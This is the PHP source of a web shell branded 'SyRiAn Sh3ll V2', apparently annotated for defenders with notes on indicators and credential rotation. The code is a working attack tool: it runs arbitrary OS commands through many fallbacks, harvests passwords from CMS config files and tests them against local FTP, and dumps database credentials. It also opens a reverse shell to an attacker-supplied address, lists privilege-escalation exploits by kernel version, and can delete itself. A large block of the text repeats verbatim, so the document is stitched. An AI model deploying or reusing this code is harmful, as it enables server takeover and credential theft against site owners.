";print"
$delmtxt
"; }
# NOTE(review): the three lines above are the tail of a definition that starts
# before this view; they are kept exactly as found.

# callfuncs($cmnd): runs $cmnd as an operating-system command and prints the
# output after htmlspecialchars(). The function_exists() arguments are bare
# words, not quoted strings. The second branch tests the negation of the first,
# so as written only shell_exec() or exec() is ever used; the popen(), system()
# and passthru() branches cannot be reached.
# Defender note: these are the calls that a `disable_functions` policy and
# monitoring of child processes spawned by the web server are meant to catch.
function callfuncs($cmnd) { if (function_exists(shell_exec)) { $scmd=shell_exec($cmnd); $nscmd=htmlspecialchars($scmd); print $nscmd; } elseif(!function_exists(shell_exec)) { exec($cmnd,$ecmd); $ecmd = join("\n",$ecmd); $necmd=htmlspecialchars($ecmd); print $necmd; } elseif(!function_exists(exec)) { $pcmd = popen($cmnd,"r"); while (!feof($pcmd)) { $res = htmlspecialchars(fgetc($pcmd)); print $res; } pclose($pcmd); } elseif(!function_exists(popen)) { ob_start(); system($cmnd); $sret = ob_get_contents(); ob_clean(); print htmlspecialchars($sret); } elseif(!function_exists(system)) { ob_start(); passthru($cmnd); $pret = ob_get_contents(); ob_clean(); print htmlspecialchars($pret); } }

# input(): picks one of four print statements depending on which of $value,
# $name and $size are empty. Every string literal is empty in this copy
# (presumably markup lost in extraction), so nothing is emitted. $type is not
# read in the visible code.
function input($type,$name,$value,$size) { if (empty($value)) { print ""; } elseif(empty($name)&&empty($size)) { print ""; } elseif(empty($size)) { print ""; } else { print ""; } }

# permcol($path): calls callperms($path) (defined outside this view) between
# print statements selected by is_writable()/is_readable(). The printed
# literals are empty in this copy.
function permcol($path) { if (is_writable($path)) { print ""; callperms($path); print ""; } elseif (!is_readable($path)&&!is_writable($path)) { print ""; callperms($path); print ""; } else { print "";callperms($path); } }

# read_dir($path,$username): recursive directory walk. $path and the entry
# name are concatenated with no separator inserted. For each readable entry
# that is not a directory and whose name is one of nine fixed configuration
# file names, get_pass() is called; a non-empty result is echoed with the file
# path and passed to ftp_check() together with $username.
# Defender note: this is credential harvesting from application config files.
# If this script is found on a host, treat every password stored in such files
# as exposed and rotate it.
function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } }

# get_pass($link): opens $link for reading (errors suppressed) and looks at the
# first line containing 'pass' (the 'password' and 'passwd' tests are subsumed
# by it). It returns the text from three characters after the first '=' up to
# the last double quote, or up to the last single quote when strrpos() reports
# no double quote (or one at offset 0). Nothing is returned when no line
# matches. No fclose() appears in the visible code.
function get_pass($link) { @$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) 
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } }

# ftp_check($login,$pass): tries $login/$pass against the FTP service on
# 127.0.0.1 and echoes the pair when the login succeeds. ftp_quit() is called
# only on a failed login.
# Defender note: runs of FTP logins originating from localhost are a log
# indicator, and the technique only pays off where a password from an
# application config file is reused for a system account.
function ftp_check($login,$pass) { @$ftp=ftp_connect('127.0.0.1'); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success\n"; } else ftp_quit($ftp); } }

# GetRealIP(): returns the first non-empty of the HTTP_X_FORWARDED_FOR and
# HTTP_CLIENT_IP environment values, else REMOTE_ADDR. The names are passed as
# bare words. The first two come from request headers, so the value is
# client-controlled.
function GetRealIP() { if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip; }

# openBaseDir(): returns '0ff' when the open_basedir ini value is empty,
# otherwise '0N' (both labels start with the digit zero).
function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = '0ff'; } else { $openBaseDir = '0N'; } return $openBaseDir; }

# str_hex($string): concatenates dechex(ord()) of each byte. There is no zero
# padding, so a byte below 0x10 contributes a single digit.
function str_hex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; }

# SafeMode(): returns '0ff' when the safe_mode ini value is empty, else '0N'.
function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = '0ff'; } else { $safe_mode = '0N'; } return $safe_mode; }

# currentFileName(): last '/'-separated component of $_SERVER["SCRIPT_NAME"].
function currentFileName() { $currentFileName = $_SERVER["SCRIPT_NAME"]; $currentFileName = Explode('/', $currentFileName); $currentFileName = $currentFileName[count($currentFileName) - 1]; return $currentFileName; }

# Suicide(): unlink() on the name returned by currentFileName(), i.e. a
# relative path.
# Defender note: the script can remove itself, so a missing file does not clear
# a host; web access logs and file-system timelines remain the evidence.
function Suicide() { unlink(currentFileName()); }

# rootxpL(): searches php_uname() output for each array key in order and
# returns the string mapped to the first key found. The keys look like Linux
# kernel version prefixes and the values appear to be names of publicly known
# local privilege-escalation exploits. $xpl is never assigned before the final
# test, so the fallback is always 'Not found.'. One value contains a line break
# in this copy.
# Defender note: the visible code only returns the text for display; the table
# itself is a stable string signature for this family of scripts.
function rootxpL() { $v=@php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, 
ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; if(!$xpl)$xpl='Not found.'; return $xpl; }

# The next nine functions each report, as a display label, whether one
# function exists or one ini value is set. The label spelling differs from
# function to function ("On"/"Off", "0N"/"0ff", "ON", " ON ").
# PostgreSQL(): tests pg_connect.
function PostgreSQL() { if(@function_exists('pg_connect')) { $postgreSQL = "On"; } else { $postgreSQL = "Off"; } return $postgreSQL; }
# Oracle(): tests ocilogon.
function Oracle() { if(@function_exists('ocilogon')) { $oracle = "On"; } else { $oracle = "Off"; } return $oracle; }
# MsSQL(): tests mssql_connect.
function MsSQL() { if(@function_exists('mssql_connect')) { $msSQL = "On"; } else { $msSQL = "Off"; } return $msSQL; }
# MySQL2(): tests mysql_connect.
function MySQL2() { $mysql_try = function_exists('mysql_connect'); if($mysql_try) { $mysql = "0N"; } else { $mysql = "0ff"; } return $mysql; }
# Gzip(): tests gzencode.
function Gzip() { if (function_exists('gzencode')) { $gzip = "ON"; } else { $gzip = "Off"; } return $gzip; }
# MysqlI(): tests mysqli_connect.
function MysqlI() { if (function_exists('mysqli_connect')) { $mysqli = "ON"; } else { $mysqli = "Off"; } return $mysqli; }
# MSQL(): tests msql_connect.
function MSQL() { if (function_exists('msql_connect')) { $mSql = " ON "; } else { $mSql = "Off"; } return $mSql; }
# SQlLite(): tests sqlite_open.
function SQlLite() { if (function_exists('sqlite_open')) { $SQlLite = "ON"; } else { $SQlLite = "Off"; } return $SQlLite; }
# RegisterGlobals(): reads the register_globals ini value.
function RegisterGlobals() { if(ini_get('register_globals')) { $registerg="On"; } else { $registerg="Off"; } return $registerg; } 
# HardSize($size): formats a byte count as GB, MB or KB (powers of 1024,
# rounded to two decimals), or as "<n> B" below 1024.
function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; }

# Curl(): "On"/"Off" label for extension_loaded('curl').
function Curl() { if(extension_loaded('curl')) { $curl = "On"; } else { $curl = "Off"; } return $curl; }

# DecryptConfig(): includes "DecryptConfig.php" from the include path (errors
# suppressed), then copies the variables and constants that file defined into
# host / database / user / password / prefix fields according to
# $_POST['ScriptType'] ('vb', 'wp', 'jos', 'phpbb', 'ipb', 'smf', 'mybb';
# presumably one code per CMS or forum product), and echoes them. Fields a
# branch does not set are echoed undefined. The 'mybb' branch assigns $prefix
# twice.
# Defender note: the output is a plaintext dump of database credentials. If
# this script is found, rotate the credentials of every application it could
# read.
function DecryptConfig() { @include("DecryptConfig.php"); if($_POST['ScriptType'] == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $modecp = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == 'jos') { $dbName = $db; $prefix = $dbprefix; $email = $mailfrom; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == 'phpbb') { $host = $dbhost; $port = $dbport; $dbName = $dbname; $user = $dbuser; $pass = $dbpasswd; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == 'smf') { $dbName = $db_name; $pass = $db_passwd; $prefix = $db_prefix; $host = $db_server; $user = $db_user; $email = $webmaster_email; } elseif($_POST['ScriptType'] == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; 
$prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$modecp.' '; }

# footer(): echoes the fixed page footer (a "[TOP]" label and a credit line).
function footer() { echo '
[TOP]
C0D3D By  ~~ [ EH SyRiAn_34G13 ] ~~ [ sy34@msn.com ] ~~ [ www.syrian-shell.com ]
'; }

# whereistmP(): returns the first directory that exists and is writable, tried
# in this order: /tmp, /usr/tmp, /var/tmp, %USERPROFILE%, %ALLUSERSPROFILE%,
# session.save_path, upload_tmp_dir, %TMP% (else %TEMP%); falls back to '.'.
function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; }

# The *shelL helpers below are Windows command-execution paths. winshelL(),
# srvshelL() and ffishelL() redirect the command's output to a file named
# uniqid('NJ') inside the whereistmP() directory, read it back, and delete it.
# Defender note: short-lived files and Windows services whose names begin with
# "NJ", and cmd.exe started from the web server's process tree, are the
# artefacts these helpers leave.

# winshelL($command): runs "cmd.exe /C <command>" through win_shell_execute(),
# sleeps one second, then returns the captured output.
function winshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; }

# update(): echoes a fixed message; nothing else happens in the visible code.
function update() { echo "[+] Update Has D0n3 ^_^"; }

# srvshelL($command): creates a Windows service with a uniqid('NJ') name whose
# path is $_SERVER['ComSpec'] (default d:\windows\system32\cmd.exe) and whose
# parameters run the command; starts, stops and deletes the service, then
# polls once a second until the output file exists.
function srvshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; }

# ffishelL($command): binds kernel32.dll WinExec through the ffi extension and
# uses it to run "cmd.exe /c <command>"; polls for the output file as above.
function ffishelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; }

# comshelL($command,$ws): calls exec() on the caller-supplied object $ws
# (presumably a COM scripting-shell object; not constructed in this view) and
# returns everything read from its StdOut. Exe() below does not call it.
function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); }

# perlshelL($command): evaluates system("<command>") through the perl
# extension and returns the buffered output.
function perlshelL($command) { $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_contents(); ob_end_clean(); return $exec; }

# Exe($command): command-execution dispatcher. Uses the first available of
# passthru, system, exec, shell_exec, popen, proc_open, then winshelL(),
# srvshelL(), ffishelL() (only when the global $windows is set) and
# perlshelL(), and returns $exec.
# Defender note: because the fallback list is long, disabling one or two PHP
# functions does not stop it; the full set needs to be covered, and shell
# processes spawned by the web server should raise an alert.
function Exe($command) { global 
$windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();} elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);} elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);} elseif(function_exists('win_shell_execute'))$exec=winshelL($command); elseif(function_exists('win32_create_service'))$exec=srvshelL($command); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; }

# magicQouts(): "0ff"/"0N" label for get_magic_quotes_gpc().
function magicQouts() { $mag=get_magic_quotes_gpc(); if (empty($mag)) { $mag = "0ff"; } else { $mag="0N"; } return $mag; }

# DisableFunctions(): the disable_functions ini value, or "NONE" when empty.
function DisableFunctions() { $disfun = ini_get('disable_functions'); if (empty($disfun)) { $disfun = "NONE"; } return $disfun; }

# Top-level: host description, printed later in the header.
$uname= @php_uname();

# SelectCommand($os): echoes one of two literals depending on whether $os is
# 'Windows'. Both literals are a single space in this copy.
function SelectCommand($os) { if($os == 'Windows') { echo " "; } else { echo " "; } }

# GenerateFile($name,$content): writes $content to $name opened with "w+"
# (created or truncated). All errors are suppressed and the return value is
# always true, so the caller cannot tell whether the write happened.
function GenerateFile($name,$content) { $file = @fopen($name,"w+"); @fwrite($file,$content); @fclose($file); return true; }

# Logout(): prints an empty literal in this copy.
function Logout() { print""; }

# Top-level request handling starts here. ?id=logout calls Logout().
if($_GET['id']== 'logout') { Logout(); }
# NOTE(review): from here on, each "# ---" banner of this collapsed copy shares
# its physical line with the statements that follow it; that layout is kept as
# found.
# After the CSS banner: the page title is echoed, plus an empty literal when
# ?id is empty.
# After the Authentication banner: when $uselogin is 1, the `user` and `pass`
# cookies are compared (loose !=) with $user and md5($pass); on mismatch the
# POST fields usrname/passwrd are compared with $user/$pass, and if they do not
# match the login form is echoed and the script exits. $uselogin, $user and
# $pass are defined outside this view.
# Defender note: the cookie names `user`/`pass` and the POST field names
# `usrname`/`passwrd` are usable indicators in captured HTTP traffic.
# ---------------------------------------# # CSS # #----------------------------------------# echo " SyRiAn Sh3ll ~ V2~ [ B3 Cr34T!V3 Or D!3 TRy!nG ] "; if($_GET['id'] == '') { echo ""; } # ---------------------------------------# # Authentication # #----------------------------------------# if ($uselogin ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != 
md5($pass)) { if($_POST[usrname]==$user and $_POST[passwrd]==$pass) { print''; } else { if($_POST[usrname]) { print''; } echo '

SyRiAn Sh3ll
UserName :

Password :

'; exit; } } }
# After the Operating System / Server Dir banners: $os is set to "Windows" when
# the second character of getcwd() is ':', otherwise "Linux"; when getcwd() is
# empty the OS environment variable or php_uname() is matched with eregi().
# $pwd comes from Exe("pwd") or Exe("cd"), with getcwd() as fallback.
# After the Header banner: one echo prints an environment summary (PHP
# settings, database extensions, disk space, versions, disabled functions,
# client and server addresses, $uname, $dir) and the output of Exe('id').
# $server is read from $SERVER_SOFTWARE, which is not assigned in this view.
# ---------------------------------------# # Operating System # #----------------------------------------# $os = null; $dir = getcwd(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; # ---------------------------------------# # Server Dir # #----------------------------------------# if(empty($dir)) { $opsy = getenv('OS'); if(empty($opsy)) { $opsy = php_uname(); } if(empty($opsy)) { $opsy ="-"; $os = "Linux"; } else { if(eregi("^Windows",$opsy)) { $os = "Windows"; } else { $os = "Linux"; } } } if($os == "Linux") { $pwd = @Exe("pwd"); } elseif($os == "Windows") { $pwd = @Exe("cd");} if(empty($pwd)) { $pwd = getcwd(); } # ---------------------------------------# # Header # #----------------------------------------# $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

  

 
SyRiAn Sh3ll
V2

  [Main] [Scripts Hacking] [Spamming] [Bypass] [About] [Logout] [SuiCide]

  Safe Mode = ".@SafeMode()."   System = ".$os."   Magic_Quotes = ". @magicQouts()."   Curl = ".@Curl()."   Register Globals = ".@RegisterGlobals()."   Open Basedir = ".@openBaseDir()."
  Gzip = ".@Gzip()."   MySQLI = ".@MysqlI()."   MSQL = ".@MSQL()."   SQL Lite = ".@SQlLite()."   Usefull Locals = ".rootxpL()."
  Free Space = ".@HardSize(disk_free_space('/'))."   Total Space = ".@HardSize(disk_total_space("/"))."   PHP Version = ".@phpversion()."   Zend Version = ".@zend_version()."   MySQL Version = ".@mysql_get_server_info()."
  MySQL = ".MySQL2()."   MsSQL = ".MsSQL()."   PostgreSQL = ".PostgreSQL()."   Oracle = ".Oracle()."   Server Name = ".$_SERVER['HTTP_HOST']."   Server Admin = ".$_SERVER['SERVER_ADMIN']."
  Dis_Functions = ". DisableFunctions()."
  Your IP = ". GetRealIP()."   Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Bing Search] [Reverse IP]   Date Time = ".date('Y-m-d H:i:s')."

  Server :  
uname -a :  
pwd :  
ID :  

  ".$server."
  ".$uname." [Google]
  ".$dir."
  ".Exe('id')."

  [Down] [Print]

";
# After the SuiCide banner: ?id=100 echoes an empty literal in this copy and
# ?id=Delete calls Suicide(). After the Main Page banner: ?id=mainPage opens
# the branch that renders the menu below; its closing brace is not within this
# view.
# Defender note: the query values id=mainPage, id=logout, id=Delete and id=100
# can be searched for in web access logs.
# ---------------------------------------# # SuiCide # #----------------------------------------# if($_GET['id'] == 100) { echo ""; } if($_GET['id'] == 'Delete') { Suicide(); } # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage' ) { echo "
"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "
  Commands Alias
";SelectCommand($os); echo "
  Command Line
  Change Directory
  Edit File
  Get File
  Server ShortCut
  CGI Perl
  Change Mode

  Back Connection

";
# Back-connection handler, run when the POST field backConnectionSubmit is set.
# It reads yourip/yourport from POST, detaches with pcntl_fork() and
# posix_setsid() when pcntl_fork exists, opens a TCP connection to that address
# (30 s timeout), starts $shell through proc_open() and relays data between the
# socket and the process pipes in reads of up to $chunk_size bytes until the
# socket or the process stdout reaches EOF. printit() is declared at the end of
# this branch, inside the `if`.
# Defender note: what this produces on a host is an outbound TCP connection
# from a web-server worker together with an interactive /bin/sh child process.
# Egress filtering on the web tier and process-lineage alerting address both.
if($_POST['backConnectionSubmit']) { $ip = $_POST['yourip']; $port = $_POST['yourport']; @set_time_limit (0); $VERSION = "1.0"; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { printit("[-] ERROR: Can't fork"); exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { printit("[-] Error: Can't setsid()"); exit(1); } $daemon = 1; } else { printit("[-] WARNING: Failed to daemonise. This is quite common and not fatal."); } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("[-] Error Can't Connect !! "); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("[+] Connected Successfully With $ip:$port"); printit("[+] SyRiAn Sh3ll V2"); while (1) { if (feof($sock)) { printit("[-] ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("[-] ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); 
fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } }
# The remaining menu labels are echoed next; the string literal opened here is
# not closed within this view.
echo "
  Hash Analyzer
  Eval Code
  Users & Domains
  Reading Files
  Encryption
  Metasploit Connection
  Show Users
  Ports Scanner
  ACP Finder
  DDOS Attacker
  Config Finder

";print"
$delmtxt
"; }
# NOTE(review): the three lines above are the tail of a definition that starts
# before this point; they are kept exactly as found.

# callfuncs($cmnd): runs $cmnd as an operating-system command and prints the
# output after htmlspecialchars(). The function_exists() arguments are bare
# words, not quoted strings. The second branch tests the negation of the first,
# so as written only shell_exec() or exec() is ever used; the popen(), system()
# and passthru() branches cannot be reached.
# Defender note: these are the calls that a `disable_functions` policy and
# monitoring of child processes spawned by the web server are meant to catch.
function callfuncs($cmnd) { if (function_exists(shell_exec)) { $scmd=shell_exec($cmnd); $nscmd=htmlspecialchars($scmd); print $nscmd; } elseif(!function_exists(shell_exec)) { exec($cmnd,$ecmd); $ecmd = join("\n",$ecmd); $necmd=htmlspecialchars($ecmd); print $necmd; } elseif(!function_exists(exec)) { $pcmd = popen($cmnd,"r"); while (!feof($pcmd)) { $res = htmlspecialchars(fgetc($pcmd)); print $res; } pclose($pcmd); } elseif(!function_exists(popen)) { ob_start(); system($cmnd); $sret = ob_get_contents(); ob_clean(); print htmlspecialchars($sret); } elseif(!function_exists(system)) { ob_start(); passthru($cmnd); $pret = ob_get_contents(); ob_clean(); print htmlspecialchars($pret); } }

# input(): picks one of four print statements depending on which of $value,
# $name and $size are empty. Every string literal is empty in this copy
# (presumably markup lost in extraction), so nothing is emitted. $type is not
# read in the visible code.
function input($type,$name,$value,$size) { if (empty($value)) { print ""; } elseif(empty($name)&&empty($size)) { print ""; } elseif(empty($size)) { print ""; } else { print ""; } }

# permcol($path): calls callperms($path) (defined outside this view) between
# print statements selected by is_writable()/is_readable(). The printed
# literals are empty in this copy.
function permcol($path) { if (is_writable($path)) { print ""; callperms($path); print ""; } elseif (!is_readable($path)&&!is_writable($path)) { print ""; callperms($path); print ""; } else { print "";callperms($path); } }

# read_dir($path,$username): recursive directory walk. $path and the entry
# name are concatenated with no separator inserted. For each readable entry
# that is not a directory and whose name is one of nine fixed configuration
# file names, get_pass() is called; a non-empty result is echoed with the file
# path and passed to ftp_check() together with $username.
# Defender note: this is credential harvesting from application config files.
# If this script is found on a host, treat every password stored in such files
# as exposed and rotate it.
function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } }

# get_pass($link): opens $link for reading (errors suppressed) and looks at the
# first line containing 'pass' (the 'password' and 'passwd' tests are subsumed
# by it). It returns the text from three characters after the first '=' up to
# the last double quote, or up to the last single quote when strrpos() reports
# no double quote (or one at offset 0). Nothing is returned when no line
# matches. No fclose() appears in the visible code.
function get_pass($link) { @$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) 
$pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } }

# ftp_check($login,$pass): tries $login/$pass against the FTP service on
# 127.0.0.1 and echoes the pair when the login succeeds. ftp_quit() is called
# only on a failed login.
# Defender note: runs of FTP logins originating from localhost are a log
# indicator, and the technique only pays off where a password from an
# application config file is reused for a system account.
function ftp_check($login,$pass) { @$ftp=ftp_connect('127.0.0.1'); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo '[FTP] '.$login.':'.$pass." Success\n"; } else ftp_quit($ftp); } }

# GetRealIP(): returns the first non-empty of the HTTP_X_FORWARDED_FOR and
# HTTP_CLIENT_IP environment values, else REMOTE_ADDR. The names are passed as
# bare words. The first two come from request headers, so the value is
# client-controlled.
function GetRealIP() { if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip; }

# openBaseDir(): returns '0ff' when the open_basedir ini value is empty,
# otherwise '0N' (both labels start with the digit zero).
function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = '0ff'; } else { $openBaseDir = '0N'; } return $openBaseDir; }

# str_hex($string): concatenates dechex(ord()) of each byte. There is no zero
# padding, so a byte below 0x10 contributes a single digit.
